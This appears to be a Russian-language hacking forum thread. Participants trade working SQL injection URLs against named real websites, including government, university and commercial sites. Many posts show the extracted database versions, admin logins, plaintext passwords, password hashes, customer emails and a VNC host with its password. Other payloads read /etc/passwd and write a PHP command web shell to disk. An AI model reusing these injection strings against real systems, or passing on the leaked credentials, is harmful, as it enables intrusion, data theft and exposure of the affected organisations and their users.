http://www.clarkhealthdept.org/news.phtml?id=-1+union+select+1,2,LOAD_FILE('/etc/passwd'),user,5+from+mysql.user/*

1ая мой sql которую более мение получилось создать :D

Ещё 1:)
http://www.clarkhealthdept.org/news.phtml?id=-1+union+select+1,2,VERSION(),user,5+from+mysql.use r/*
1ая мой sql которую более мение получилось создать :D

http://www.clarkhealthdept.org/news.phtml?id=-1+union+select+1,2,VERSION(),concat(password,char( 58),user),5+from+mysql%20.user/*

Ещё 2 нашел :)
http://megaload.megalan.tv/catalog.php?id=-1+union+select+1,2,3,4,5,6,USER(),version()/*
http://ethology.ru/humor/?id=-1+union+select+1,2,3,user(),DATABASE()/*
Из за своего малого опыта в скуль инъекциях ни че подобрать не удалось...может у вас чё нить получиться

http://www.paintball.ru/next.php?id=430%20union%20select%201,2,COLUMN_NAME %20FROM+INFORMATION_SCHEMA.COLUMNS%20limit%200,1/*

columns
CHARACTER_SET_NAME DEFAULT_COLLATE_NAME DESCRIPTION MAXLEN ID IS_DEFAULT IS_COMPILED SORTLEN TABLE_CATALOG TABLE_SCHEMA TABLE_NAME COLUMN_NAME ORDINAL_POSITION COLUMN_DEFAULT IS_NULLABLE DATA_TYPE CHARACTER_MAXIMUM_LENGTH CHARACTER_OCTET_LENGTH NUMERIC_PRECISION NUMERIC_SCALE COLUMN_TYPE COLUMN_KEY EXTRA PRIVILEGES COLUMN_COMMENT GRANTEE PRIVILEGE_TYPE IS_GRANTABLE CONSTRAINT_CATALOG CONSTRAINT_SCHEMA CONSTRAINT_NAME POSITION_IN_UNIQUE_CONSTRAINT REFERENCED_TABLE_SCHEMA REFERENCED_TABLE_NAME REFERENCED_COLUMN_NAME QUERY_ID SEQ DURATION CPU_USER CPU_SYSTEM CONTEXT_VOLUNTARY CONTEXT_INVOLUNTARY BLOCK_OPS_IN BLOCK_OPS_OUT MESSAGES_SENT MESSAGES_RECEIVED PAGE_FAULTS_MAJOR PAGE_FAULTS_MINOR SWAPS SOURCE_FUNCTION SOURCE_FILE SOURCE_LINE SPECIFIC_NAME ROUTINE_CATALOG ROUTINE_SCHEMA ROUTINE_NAME ROUTINE_TYPE DTD_IDENTIFIER ROUTINE_BODY ROUTINE_DEFINITION EXTERNAL_NAME EXTERNAL_LANGUAGE PARAMETER_STYLE IS_DETERMINISTIC SQL_DATA_ACCESS SQL_PATH SECURITY_TYPE CREATED LAST_ALTERED SQL_MODE ROUTINE_COMMENT DEFINER CATALOG_NAME SCHEMA_NAME DEFAULT_CHARACTER_SET_NAME DEFAULT_COLLATION_NAME NON_UNIQUE INDEX_SCHEMA INDEX_NAME SEQ_IN_INDEX COLLATION CARDINALITY SUB_PART PACKED NULLABLE INDEX_TYPE COMMENT TABLE_TYPE ENGINE VERSION ROW_FORMAT TABLE_ROWS AVG_ROW_LENGTH DATA_LENGTH MAX_DATA_LENGTH INDEX_LENGTH DATA_FREE AUTO_INCREMENT CREATE_TIME

TABLE
CHARACTER_SETS COLLATIONS COLLATION_CHARACTER_SET_APPLICABILITY COLUMNS COLUMN_PRIVILEGES KEY_COLUMN_USAGE PROFILING ROUTINES SCHEMATA SCHEMA_PRIVILEGES STATISTICS TABLES TABLE_CONSTRAINTS TABLE_PRIVILEGES TRIGGERS USER_PRIVILEGES VIEWS pb_cat pb_cat_tree pb_city pb_club pb_dealer pb_info pb_journal_obl pb_journal_st pb_kalendar pb_links pb_news pb_news_theme pb_portal pb_reviews pb_team pb_users

http://earthdata.com/newsarticle.php?id=430%20union%20select%201,AES_DE CRYPT(AES_ENCRYPT(user,0x78),0x78),AES_DECRYPT(AES _ENCRYPT(password,0x78),0x78),4,5,6%20from%20mysql .user


http://www.phfokc.com/show_press.php?id=430%20union%20select%201,2,versi on(),4/* 5versia

http://www.eatmybrains.com/showfeature.php?id=430%20union%20select%201,2,3,na me,5,version(),7,8,9,10,11,12,13,14,15,16%20from%2 0user/*

http://www.georgiasouthern.edu/askgus/viewanswer.php?q=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws (0x3b,user(),database(),version()),0x71),0x71),3,4 ,5,6,7,8,9,10,11,12,13,14/*

где можно посмотреть список sql inj, а то могут повторяться

kair
http://hack-shop.org.ru/sql.php

http://www.clarkhealthdept.org/news.phtml?id=-1+union+select+1,2,VERSION(),concat(password,char( 58),user),5+from+mysql%20.user/*
root:0a53c31a74397e18
Так лучше:
username = "root";
password = "jd4495jv";
таблица:
http://www.clarkhealthdept.org/news.phtml?id=-1+union+select+1,2,3,concat(username,0x3a,password ),5+from+meg.admin/*
админка закрыта на уровне htaccess :(
http://www.clarkhealthdept.org/admin

http://latchmusic.com/1-2-3-music-store/process.php?pname=ShowAlbumProcess-Start&CategoryID=1/**/and/**/1=2/**/UNION/**/ALL/**/SELECT/**/concat(0x31203C666F6E7420636F6C6F723D7265643E,logi n,0x3a,passwd,0x3C2F666F6E743E)/**/from/**/user/*

получаем л+п:

hacked:hax

paradigma.kz
bankinfo.kz
sports.kz
http://www.paradigma.kz/index.php?part=info&article_type_id=-1+union+select+1,VERSION(),database(),4,5,6,7,8,9, 10,11,12,13/*
http://bankinfo.kz/rus/banks/bank.shtml?id_bank=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
http://sports.kz/news.php?type=small&id=-1+union+select+1,2,VERSION(),4,5,USER(),7,8/*

где можно посмотреть список sql inj, а то могут повторяться
http://antiboyansql.narod.ru/sql.txt

http://www.deng-yun.com/new.php?tid=-1+union+select+convert(version()+using+latin1)+fro m+mysql.user/*
Только вот не получается ничего оттуда вывести

че-то не выводит нихрена хотя таблицу подобрал:)
http://www.moto.com.ua/forum.php?id=1'+Union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,database(),16,17/*
тут походу слепая
http://www.ais.com.ua/news_detail.php?page_id=15'&news_id=816'
заранее ивеняюсь но в MS SQL не шарю... но помне так это оно еси нет то правьте
http://www.avto-bazar.com.ua/objava.asp?id=1'

тута стопудово
http://www.avtoreklama.com.ua/?show_other&rub=22'+union+select+version(),2/*

Нашел скульку на gocalif.ca.gov с PR - 7..
Думал будут денюшки =)
Не тут то было...
Скульку то я нашел...
http://gocalif.ca.gov/page.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),5,6/*
Mysql version - 4.1.20-log
MySQL user - cttc@206.188.24.66
MySQL database - cttc_site

Экранирования кавычек нету:
http://gocalif.ca.gov/page.php?id=-1+union+select+1,2,3,'Antichat%20-%20imho%20the%20best%20(c)%20b00zy_c0d3r',5,6/*

Даже права есть...
http://gocalif.ca.gov/page.php?id=-1+union+select+1,2,3,'We%20have%20every%20right',5 ,6+from+mysql.user/*

File-priv тоже есть...проверили на /tmp/
http://gocalif.ca.gov/page.php?id=-1+union+select+1,2,3,'%3C?php%20system($_GET[cmd]);%20?%3E',5,6+from+mysql.user+into+outfile+'/tmp/antichat.php'/*

Но вот пути для заливки шелла я не нашел =(

http://www.bikeshop.com.ua
http://www.bikeshop.com.ua/news.php?id=-1+union+select+1,user(),3,database(),5/*
К сожелению базы подобрать не смог.

http://www.bikeshop.com.ua
http://www.bikeshop.com.ua/news.php?id=-1+union+select+1,user(),3,database(),5/*
К сожелению базы подобрать не смог.
прав нету на просмотр списка таблиц

прав нету на просмотр списка таблиц
O_O, что ещё придумаешь?)
http://www.bikeshop.com.ua/news.php?id=-1+union+select+1,concat(customers_email_address,0x 3a,customers_password),3,4,5+from+customers+limit+ 0,1/*

прав нету на просмотр списка таблиц
http://www.bikeshop.com.ua/news.php?id=-1+union+select+1,version(),3,4,5/*

права то есть, только в 4й версии тупо списка таблиц нету ;)

-------------------------

заранее ивеняюсь но в MS SQL не шарю... но помне так это оно еси нет то правьте
тебе сюда -
http://forum.antichat.ru/thread30501-mssql.html

Спасиб ice1k :)
http://www.belexpocentr.ru/show.php?id=-1+union+select+1,2,3,4,5,version(),7,database(),us er(),10,11,12,13,14,15,16,17,18,19,20,21/*
http://www.sibezrcs.ru/articles.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*
Базы как всегда не смог подобрать...

http://orden.elite-games.ru/article.php?id=-1+union+select+1,2,3,4,version(),database(),7,8,9, 10,11,12,13,14,15,16,17,18,19,20/*
тута ВРОДЕ бы не хавтает прав.или тупо нету баз=)
http://www.korsteklobor.ru/category.php?id=-1+union+select+1,2,3/*
Тута я ни че не могу вывести на поля

Comedy Club Молдованский стайл

http://www.comedy.md/residents.php?id=43'

версия, как мы узнаем, пятая, что не может не радовать наши шалавливые ручки..

http://www.comedy.md/residents.php?id=-43+union+select+1,2,3,concat_ws(0x3a,user(),versio n(),database())/*
на сайте есть форум phpbb, стандартный префикс к таблицам у которого phpbb_, молдованские админы ничего не стали придумывать, им итак, видно, весело. находим запись пользователя с подозрительным ником admin и хеш к его паролю - 92608e8ef9fd8c3f4e896c63e0e26e79, обращаемся к passcracking.ру, милый сервис просит подождать часок-другой-пятый, идем на форум, глядим на юзера следующего за админом с менее амбициозным ником zornig, но тем не менее с правами админа. Хеш 7694f4a66316e53c8cdd9d9954bd611d уж слишком брутальный для любого админа, ибо пароль к нему просто буква q.
админка по адресу http://www.comedy.md/controlpanel/ нагло плюется в нашу сторону ошибкой. А жаль ведь мы уже нашли таблицу tbladmins http://www.comedy.md/residents.php?id=-43+union+select+1,2,3,concat_ws(0x3a,table_name)+f rom+information_schema.tables+limit+46,1/* и выловили из нее интересные вещи :http://www.comedy.md/residents.php?id=-43+union+select+1,2,3,concat_ws(0x3a,admid,adminlo gin,adminpwd,status)+from+tbladmins+limit+0,1/*4:comedy:f682468003680f7e3add8888ce60ffa51b6a917b
хеш, кстати, sha1, ну да бог с ним, все равно он нам не понадобится...
конец.

Нашел скульку на gocalif.ca.gov с PR - 7..
Думал будут денюшки =)
Не тут то было...
Скульку то я нашел...
http://gocalif.ca.gov/page.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),5,6/*
Mysql version - 4.1.20-log
MySQL user - cttc@206.188.24.66
MySQL database - cttc_site

Экранирования кавычек нету:
http://gocalif.ca.gov/page.php?id=-1+union+select+1,2,3,'Antichat%20-%20imho%20the%20best%20(c)%20b00zy_c0d3r',5,6/*

Даже права есть...
http://gocalif.ca.gov/page.php?id=-1+union+select+1,2,3,'We%20have%20every%20right',5 ,6+from+mysql.user/*

File-priv тоже есть...проверили на /tmp/
http://gocalif.ca.gov/page.php?id=-1+union+select+1,2,3,'%3C?php%20system($_GET[cmd]);%20?%3E',5,6+from+mysql.user+into+outfile+'/tmp/antichat.php'/*

Но вот пути для заливки шелла я не нашел =(

Вообщем пол дня пытался подобрать имя к хоум дире, получил след результаты.

пути:
/etc/httpd/conf/httpd.conf - апач
/var/www/html - htdocs

таблица:
users
http://www.visitcalifornia.com/page.php?id=-1+union+select+1,2,3,user_name,password,email,7,8, 9,10,11,12,13,14,15+from+users+limit+0,1/*
лимит в помощь

админка(cms):
http://gocalif.ca.gov/site/cms/index.php

vnc client:
host=64.160.126.137
port=5900
password=9555cd837f884713

ЗЫ
Название хоум диры ппц ((

http://shirley.ru/cat.php?id=-1+union+select+uname,pass+from+shir_users+limit+1, 1/*
cсливаем базу юзеров по 1
http://www.vikinggames.hu/product.php?id=-1+union+select+1,username,password,4,email_address ,6,7+from+timesheet_user+limit+0,1/*
тут тож
http://board.kinklub.com/ind.php?pn=2&id_categ=1+union+select+1,2,3,4,5,userLogin,userPa ssword,8,9,10,11,12,13,14,15+from+admins/*
логин: admin
пасс: admin
;)
http://www.fotovilag.hu/links/cat.php?id=1+union+select+1,2,user_name,4,user_pas sword,6+from+user+limit+1,15/*&menu_id=5
С помощью лимита сливаем тамблицу юзеров...

http://www.pervogid.ru/index.php?id=-1+union+select+1,2,3,4,5,6,7,8/*

http://www.muscletalk.ru/food.php?id=105'+union+select+1,2,3,4,5,6/*
наткнулся.

Искал админку, нашёл SQL =\
http://www.admin.nyagan.ru/print.php?conid=-358+union+select+1,2,3,4,5,6,7,8,9

Boston University

TV
http://www.butv10.com/series.php?id=-1+union+select+1,convert(concat(version(),0x3a,use r(),0x3a,database()),binary),3,4,5,6,7,8,9,0,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25/*

www.bu.edu
http://www.bu.edu/phpbin/news/releases/display.php?id=-1+union+select+convert(concat(version(),0x3a,user( ),0x3a,database()),binary),2,3,4,5,6,7,8,9,0,11,12 ,13,14,15,16,17/*

Искал админку, нашёл SQL =\
Не знаю, что за одминку ты там искал, но уже кто-то шелл r57 залил ;)
Причем язык какой-то турецкий нах, и не запаролен он!
http://www.admin.nyagan.ru/admin.php

гы, еще и C99 шелл там же валяется, видимо очень модный, известный сайт)))
Афигеть, шелл индонезийский, на наши сайты позарились ИНДОНЕЗИЙСКИЕ КУЛ ХАЦКЕРЫ )))))))))

ЗЫ
тока забыли пароль поставить =\
ЗЗЫ
прошу наших умельцев сайт пока не ломать и шелл не трогать, пусть народ поглумится...

http://www.fortline.ru/page.php?id=2+union+select+1,password,3,login+from +users+limit+7,10/*
admin:Y2g3Yjhh

тута ВРОДЕ бы не хавтает прав.или тупо нету баз=)
http://www.korsteklobor.ru/category.php?id=-1+union+select+1,2,3/*
Тута я ни че не могу вывести на поля


вот так выводится ;)

http://www.korsteklobor.ru/category.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws (0x3a,user(),database(),version()),0x7a),0x7a),3/*

хостинг вроде какой-то бесплатный )
http://www.ccr.ru/print.php?id=-1+union+select+1,2,3,4,aes_decrypt(aes_encrypt(con cat_ws(0x203a20,username,password,id),31337),31337 ),6,7,8,9,10,11,12+from+users/*
1933 акка

http://www.ukrmusic.com.ua/rus/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,na me,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+fr om+users/*
пассы не смог вывести...
-------------------------------
http://www.riotinmyheart.net/fanlistings/category.php?id=1+union+select+user_login+from+wp_ users/*
http://www.riotinmyheart.net/fanlistings/category.php?id=1+union+select+user_pass+from+wp_u sers/*
admin:9393db8a978983f3b1bd0818eb4f6b21

http://www.suplementydiety.pl/index.php?id=-1+union+select+1,username,user_password,4,5,6,7,8, 9,10+from+phpbb_users+limit+1,1/*
admin:35d08531d3d78614e281b191f10ac78f
P.S.Подскажить какой формат етих хэшов?md5?

Кинотеатр =\

http://marscity.ru/ansver.php?konkurs=-1+UNION+SELECT+1,2,3,4,5+from+konkurs/*

mydak.ru
http://www.mydak.ru/message.php?pid=-1'+union+select+111,222,333,444,555,concat_ws(0x3a ,database(),user(),version()),7,8,9/*
Вывод смотреть в исходном коде страницы в <head><meta

http://admin.org/EventView.php?event_id=-40+UNION+SELECT+VERSION()/*

http://www.ursulduun.mn/index.php?action=menudata&id=-1+union+select+1,concat_ws(0x3a,pass,name),3+from+ users/*
admin:e00cf25ad42683b3df678c61f42c6bda
http://www.nikman.net/02/forum_topic.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),version() ,database()),4,5,6/*
user:u70311246@cgihos
version:5.0.24a-log
database:d60196308

http://ekipage.com/2007/2007_year.html?item=-64+UNION+SELECT+1,2,3,4,5,6,7,'shell'/*

http://www.southworth.com/page.php?id=-130+union+select+concat_ws(0x3a,username)+from+use rs+limit+0,1/*
http://www.southworth.com/page.php?id=-130+union+select+concat_ws(0x3a,password)+from+use rs+limit+0,1/*
login:kelly pass:meex
login:Maryann pass:Meeks

http://www.thefetus.net/
http://www.thefetus.net/page.php?id=-405+union+select+1,username,3,4,5,6,7,8,9,10,11,12 ,13,14+from+admin/*
http://www.thefetus.net/page.php?id=-405+union+select+1,password,3,4,5,6,7,8,9,10,11,12 ,13,14+from+admin/*
thefetus : pj2698

http://youriddle.it/index.php?id=-1+union+select+user,password+from+user+limit+0,1/*
;)

http://fk.uni-mb.si/index.php?id=1+union+select+1,2,3,4,user,6,7,8,9,1 0,11,12,13,14,15+from+mysql.user/*
http://fk.uni-mb.si/index.php?id=1+union+select+1,2,3,4,password,6,7,8 ,9,10,11,12,13,14,15+from+mysql.user/*
root : fkadmin

сайт:www.triphopcr.net

кол-во юзеров:1729

Поля:имя,пасс,мэйл

http://www.triphopcr.net/artista.php?id=-6+union+select+concat(username,char(58),password), email,3+from+users+limit+1729,1728/*

Админ
login:Javier
pass:monsterchis
mail:webmaster@triphopcr.net

www.cotraj.ru

http://www.cotraj.ru/catalog/sizes.php?id=-1 +union+select+1,password,3, 4,email,6,7+ from+user/*

http://www.joelformayor.com/blog.php?name=full&id=-1+union+select+1,username,password,4,5+from+users+ limit+0,1/*
steebass:4aec6b4b0216e6ef

http://www.realty.lv/?lang=rus&id=-1+union+select+concat_ws(0x3a,login,pass)+from+use r+limit+0,1/*
9:45c48cce2e2d7fbdea1afc51c7c6ad26

http://www.allaboutjazz.com/php/news.php?id=-14411+union+select+1,2,concat_ws(0x3a,user(),versi on(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28/* allaboutjazz.com:таблицу с юзерами не нашел...

газпром? )
http://ccgazprom.ru/?section=gloomery'+union+select+1,2,concat_ws(0x20 3a20,version(),user(),database()),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23/*

Испанский хек портал:
www.elhacker.org

http://www.elhacker.org/index.php?Ver=Articulo&Id=-339+union+select+1,2,version(),user(),database(),6 ,7,8,9,10,11,12,13,14,15,16,17,18,19/*
Таблы не подобрал, похоже на испанском =\

1. www.bustur.ru

http://www.bustur.ru/t.php?id=-1+union+select+concat_ws(0x203a20,version(),user() ,database())/*

2. www.top-manager.ru

http://www.top-manager.ru/?a=1&id=116+union+select+version(),user(),3,4,database( ),6,7,8/*

3. www.iwdp.co.uk

http://www.iwdp.co.uk/profile.php?id=-1+union+select+1,user(),version(),database(),5,6,7 ,8,9,10,11/*

4. www.dog.ru

http://www.dog.ru/index.php3?mode=5&id=-1+union+select+1,id,3,4,5,6,7,8,9,10,11,12,name,em ail+from+users/*

5. www.meteoprog.com.ua

http://www.meteoprog.com.ua/table.php?cityid=-1+union+select+concat_ws(0x203a20,version(),user() ,database())/*

2. www.top-manager.ru

http://www.top-manager.ru/?a=1&id=116+union+select+version(),user(),3,4,database( ),6,7,8/*

помойму так лудше=)
Таблица админа:
http://www.top-manager.ru/?a=1&id=116+union+select+username,2,3,4,passwd,6,7,8+fr om+adm+limit+0,1/*
Таблица юзеров:
http://www.top-manager.ru/?a=1&id=116+union+select+login,2,3,4,passwd,6,7,8+from+ users+limit+0,1/*
P.S. Пасс админа в открытом виде так что можешь искать админку,и ломать ;)

http://www.meteoprog.com.ua/table.php?cityid=-1+union+select+concat_ws(0x203a20,version(),user() ,database())/*


Вот еще моя старая
http://meteoprog.com.ua/gorodMira.php?cityid=-1+union+select+1/*

Вот еще парочка

http://www.ozarkfolkcenter.com/country-store/shop.asp?cat=17&type=Fruit+Chunky'+union+select+@@version,2--

http://www.gridrecordings.com/shop.asp?id=1+or+1=(select+top+1+table_name+from+i nformation_schema.tables+where+table_name+not+in(' Formats','Images','DataTypes','forum_posts','Sampl es','News','Artists','Admin','Discography','Tracks ','Newsletter','forum_users','OrderDetails','Order s','Countries','Customers','Shipping','Products',' FormatVariations','ShippingCosts','forum_forums',' ShippingZones','Newsletters','GalleryFiles','newsl etter_content','Audio','Links','Mailinglist','View _orders','Homepage','Artist_Extras','Artist_Charts ','sysdiagrams','GalleryCat','Releases','Gallery', 'Banners','mailing_poster','mailing_view','comd_li st','forum_topics','Labels'))--

http://willow.thrilljockey.com/artists/index.html?id=10001+and+1=0+union+select+1,@@versi on,3,4--

http://www.thamesvalley.co.uk/content/index.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+ INFORMATION_SCHEMA.tables+WHERE+TABLE_NAME+NOT+IN+ ('cartV2','c2h_ContentPublish','CustomCharge','vwL ateFIGrpPostCur','surfaceview_OrderDetails','mayfa irtoys_Links','retailteam_SupplierProductLink','Da teWatch'))--

http://www.biztrav.co.nz/Shop.asp?id=85+or+1=(select+top+1+table_name+from+ information_schema.tables)--

Еще одна!

http://www.orangescarf.com/shop.asp?cat=137+or+1=@@version--

PR = 4

Государственная инспекция связи

http:// www . gis.uz/index.php?part=news&lang=rus&snum=-40'+union+select+1,2,3,4,aes_decrypt(aes_encrypt(c oncat_ws(0x3a,user,password),0x7a),0x7a),6+from+my sql.user/*
root:root ;)

PR = 6
Национальное информационное агентство
http: / / www .uza.uz/documents/?id1=-22709+union+select+1,2,3,4,5,aes_decrypt(aes_encry pt(concat_ws(0x3a,version(),user(),database()),0x7 a),0x7a),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
4.1.15-Debian_0.dotdeb.4-log:uza@localhost:uza

Только вот не получается ничего оттуда вывести http://www.deng-yun.com/new.php?tid=-1+union+select+convert(version()+using+latin1)+fro m+mysql.user/*
вот так выводится =)
http://www.deng-yun.com/new.php?tid=-1+union+select+AES_DECRYPT(AES_ENCRYPT(concat_ws(0 x3a,user(),database(),version()),0x7a),0x7a)+from+ mysql.user/* root@localhost:menglida:4.1.18-max
http://www.deng-yun.com/new.php?tid=-1+union+select+AES_DECRYPT(AES_ENCRYPT(concat_ws(0 x3a,user,password),0x7a),0x7a)+from+mysql.user+lim it+0,1/* root:*E60C5A74517ADD5F3CFACA0E8270CC8592A1218C

http://www.zoosbank.mn/info_view.php?id=490%20union%20select%201,name,3,p assword,5,6,7,8,9,10%20from%20admin%20limit+0,1/*
гмм... интересно, а есть на этот язык словарь?

http://lorientaliste.free.fr/annu.php?origine=-1+UNION+SELECT+1,2,3,4,5,char(241,234,243,235,255, 32,229,225,224,242,252,32,229,229,32,226,32,240,23 8,242),7,8/*

http://www.buybrand.ru/rus/index/news?id=780%20union%20select%201,2,name,4,5,6,7,8% 20from%20users/*
а пароли не нашел :mad:

Получите - распишитесь :)

http://www.britishcat.ru/articles.html?Action=ShowArticle&Article=-1+union+select+1,2,3,4,concat_ws(char(58),username ,password,salt,email,icq,skype)+from+vbuser/*

http://www.buybrand.ru/rus/index/news?id=780%20union%20select%201,2,name,4,5,6,7,8% 20from%20users/*
а пароли не нашел :mad:

Вот пароль :)

http://www.buybrand.ru/rus/index/news?id=-1%20union%20select%201,2,name,4,5,passw,7,8+from%2 0users/*

первые два связаны с la2
http://host.clanmpo.com/clanmpo/item.php?id=-1+Union+select+1,user(),3,4,5/*
http://www.akatsuki.asturservers.com/open-L2DP/item.php?id=-1+Union+select+1,2,3,TABLE_NAME+from+INFORMATION_S CHEMA.TABLES+LIMIT+2,1/*
http://www.books.bg/Item.php?id=-1+union+select+user()/*

http://host.clanmpo.com/clanmpo/item.php?id=-1+Union+select+1,user(),3,4,5/*

http://host.clanmpo.com/clanmpo/item.php?id=-1+Union+select+1,concat_ws(0x203a20,user,password) ,3,4,5+from+mysql.user/*

root : 1be122933e65c0f2
;-)

http://argotrans.info/news_tr.php?id=1+union+select+1,2,3,4,5,6,id_user, 8,9,10+from+user/*
дальше подобрать не могу... кто сможет с меня ++ (оч надо)...

дальше подобрать не могу...
Дык
http://argotrans.info/news_tr.php?id=1+union+select+1,2,3,4,5,6,concat(l ogin_user,0x3a,password_user),8,9,10+from+user/*

http://yaeda.org/bugtrack/showbug.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws (0x3a,user(),database(),version()),0x7a),0x7a),3,4 ,5,6,7,8,9,10,11,12+from+mysql.user/*
root@192.168.0.3:bugs:5.0.18-log
http://yaeda.org/bugtrack/showbug.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws (0x3a,db),0x7a),0x7a),3,4,5,6,7,8,9,10,11,12+from+ mysql.db/*
есть база даных; asystem
http://yaeda.org/bugtrack/showbug.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws (0x3a,user,password),0x7a),0x7a),3,4,5,6,7,8,9,10, 11,12+from+mysql.user+limit+0,1/*
root:*97EB633C4A82BD6AE86EB0CA129D2CD0CBF93228

http://www.thebiggreen.net/article.php?id=-516+union+select+1,2,3,4,5,6,concat_ws(0x3a,user_i d,username,password,email,access),8,9,0,1+from+bg_ users+limit+0,1/*(пароли md5 (unix))

http://transport.su/news.php?rub=6&id=23212+union+select+1,2,3,4,5,6,7,password,9,10+ from+users/*
ПАССЫ В МД5
http://transport.su/news.php?rub=6&id=23212+union+select+1,2,3,4,5,6,7,login,9,10+fro m+users/*
Логины но почему-то страничка не отвечает:(

Таблицы не подобрал :(
http://asun.unl.edu/page.php?page_id=1+union+select+1,2,3/*

Y.Dmitriy, limit поюзай и все будет открываться
[code]http://transport.su/news.php?rub=6&id=23212+union+select+1,2,3,4,5,6,7,login,9,10+fro m+users+limit+2,1/*[code]

http://kipelov.ru/ly.php?idtxt=-1+union+select+2,3,4/*

:))

Сайтег Гарварда...
http://www.law.harvard.edu/faculty/directory/facdir.php?id=20+union+select+user(),database()/*
facdir@localhost: academics

САЙТ ГОСУДАРСТВЕННОЙ НАЛОГОВОЙ АДМИНИСТРАЦИИ УКРАИНЫ
!!!!СЦУКО НЕНАВИЖУ!!!
http://www.sta.gov.ua/basa1/data.php3?reason=access&sess=&rub=-1+union+select+1,user(),3,4/*

САЙТ ГОСУДАРСТВЕННОЙ НАЛОГОВОЙ АДМИНИСТРАЦИИ УКРАИНЫ
!!!!СЦУКО НЕНАВИЖУ!!!
Ещё бы пасс.
Супер

Таблицы не подобрал :(
http://asun.unl.edu/page.php?page_id=1+union+select+1,2,3/*
http://asun.unl.edu/page.php?page_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,user(),13,1 4,15/*
вот подобрал колонки!

http://stumpage.uvm.edu/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,column_name,12 +from+information_schema.columns/*/

http://edcommunity.apple.com/ali/news_feed.php?itemID=9449'+order+by+9/*
http://edcommunity.apple.com/ali/item.php?itemID=11767'+union+select+1/*

P.S.:
как можно обойти это:
http://edcommunity.apple.com/ali/search.php?collectionID=1234&order=1+union+select+1,2/*

MsSql:

http://www.raytelmedcorp.com/Content.asp?CategoryID=0&CurrentID=17+or+1=@@version--
http://www.raytelmedcorp.com/Content.asp?CategoryID=0&CurrentID=17+or+1=(select+db_name())--
http://www.raytelmedcorp.com/Content.asp?CategoryID=0&CurrentID=17+or+1=(select+system_user)--

Таблицы:
D99_Tmp
Category
D99_CMD
Dic_BodyPart
Dic_HX
Dic_Language
Dic_State
Dic_Test
dtproperties
ip
Message
Rights
Role
SessionAction
SessionLog
Siwebtmp
Subscriber
sysconstraints
syssegments
systables
User
v_Category
v_Rights
v_SessionActions

Нашел все колонки в таблице User:
ID
RoleRef
System
Name
Password
FirstName
LastName
EMail

Не получилось последнее:http://www.raytelmedcorp.com/Content.asp?CategoryID=0&CurrentID=17+or+1=(SELECT+TOP+1+Name+from+User+whe re+ID=3)--
Как реализовать?

http://www.ofmusic.ru/mat/index.php?id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12 +from+information_schema.columns/*&mid=796

University of Arkansas Pine Bluff =)
http://www.uapb.edu/calendar.php?method=EventDetail&Eid=-39+union+select+1,user(),3,4,version(),6,7/*
http://www.uapb.edu/calendar.php?method=EventDetail&Eid=-39+union+select+1,concat(user,0x3a,password),3,4,5 ,6,7+from+mysql.user/*
http://www.uapb.edu/calendar.php?method=EventDetail&Eid=-39+union+select+1,2,3,4,load_file(char(47,101,116, 99,47,112,97,115,115,119,100)),6,7/*
http://www.uapb.edu/calendar.php?method=EventDetail&Eid=-39+union+select+1,2,3,4,load_file(char(47,101,116, 99,47,104,111,115,116,115)),6,7/*
http://www.uapb.edu/calendar.php?method=EventDetail&Eid=-39+union+select+1,concat(AdminID,0x3a,AdminName,0x 3a,AdminLoginName,0x3a,AdminPassword),3,4,5,6,7+fr om+admin/*

http://www.anycorp.com/log/log.php?id=-9+union+select+1,2,3,4/*

http://zaki.ru/pagesnew.php?id=-1+union+select+1,2,3/*
2 I-I()/Ib
Sorry, лишний дописал

http://zaki.ru/pagesnew.php?id=-1+union+select+1,2,3,4/*
Шо за нах? Вообще то там три столбца.... То бишь вот так:
http://zaki.ru/pagesnew.php?id=-1+union+select+1,2,3/*

А судьи кто?

http://www.vkks.ru/edit_ks.php?id=-1508%20union%20select%201,2,3,AES_DECRYPT(AES_ENCR YPT(concat(user,0x3a,password),1),1),5,6,7,8,9,10, 11%20from%20mysql.user/*

http://www.zonewm.biz/showasf.php?id=4+union+select+1,mail,3,pass,5,6,7, 8,9+from+user/*


http://www.webmarket.mobi/wm.php?id=3+union+select+1,2,table_name,4,5,6+from +information_schema.tables/*

http://www.webmarket.mobi/wm.php?id=3+union+select+1,p_user,pin_kod,4,ktype_ karta,6+from+karty_pin/*

http://www.rabota-chelyabinsk.info/agency.php?r=vac&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,concat_ws(0x203a20,email,pass),21,22, 23,24,25,26,27,28,29+from+jobsmarket_spb.users
урлы = бд
PR от 1 до 5:

rabota-belgorod.info
rabota-bryansk.info
rabota-chelyabinsk.info
rabota-chita.info
rabota-ekaterenburg.info
rabota-ekaterinburg.info
rabota-irk.info
rabota-izhevsk.info
rabota-kaluga.info
rabota-kazan.info
rabota-khabarovsk.info
rabota-kirov.info
rabota-kostroma.info
rabota-krasnodar.info
rabota-krasnoyarsk.info
rabota-kursk.info
rabota-lipetsk.info
rabota-murmansk.info
rabota-norilsk.info
rabota-nsb.info
rabota-nsk.info
rabota-omsk.info
rabota-orel.info
rabota-orenburg.info
rabota-penza.info
rabota-perm.info
rabota-pskov.info
rabota-rostov.info
rabota-ryazan.info
rabota-samara.info
rabota-saratov.info
